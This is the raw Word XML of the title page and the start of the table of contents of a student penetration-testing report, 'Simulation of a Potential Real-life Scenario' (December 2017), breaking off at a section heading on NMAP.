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037478" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="005B638E" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6698190D" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">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4109E134" wp14:editId="3311578A">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7405F27E" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2334C5C2" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A93723A" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4591F13D" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE086A8" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="005B638E" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629A982C" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Simulation of a P</w:t>
      </w:r>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">otential </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>eal-life</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>cenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCCB237" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="0066017F" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="001B121C" w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADDC6D7" w14:textId="77777777" w:rsidR="0066017F" w:rsidRPr="001B121C" w:rsidRDefault="0066017F" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3921FE4C" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Samuel Lee Jones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68257B6E" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>P142471</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD124B" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B366DF" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="0066017F" w:rsidP="0066017F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066017F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>SJones.142471@studnet.uwtsd.ac.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087E1F28" w14:textId="77777777" w:rsidR="0066017F" w:rsidRPr="001B121C" w:rsidRDefault="0066017F" w:rsidP="0066017F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697DEB9A" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>December 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC45FA2" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="6E957C33" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="0066017F" w:rsidRDefault="001B121C" w:rsidP="0066017F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77CAB320" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="3646C38B" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="53C87B25" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="4D291780" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="3C777A45" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="4E9A6AB4" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="14FC59BA" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="300B0259" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="3165D8A4" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="2B34C9EC" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="23331B02" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="7A9FDF02" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="623B5446" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="191CE7B6" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="04F1E246" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="4E8250E6" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="78666D9B" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="0C87BC49" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="4E4F026D" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="481CFB7F" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="1AE90032" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="1755624498"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="77B93575" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="001B121C" w:rsidRDefault="001B121C">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="auto"/>
              <w:sz w:val="44"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="001B121C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="auto"/>
              <w:sz w:val="44"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1744CBA8" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="001B121C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="001B121C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="001B121C">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="001B121C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc501124778" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Introduction</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124778 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4545B323" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124779" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Contingency Plan</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124779 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DF62E04" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124780" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Penetration Testing Framework</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124780 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0850234D" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124781" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Framework Breakdown</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124781 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0566FE45" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124782" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Research</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124782 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B354082" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124783" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Tools and Attacks</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124783 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24F891D8" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124784" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Tools Used</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124784 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EFFE468" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124785" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 NMAP</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124785 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69EA5AEC" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
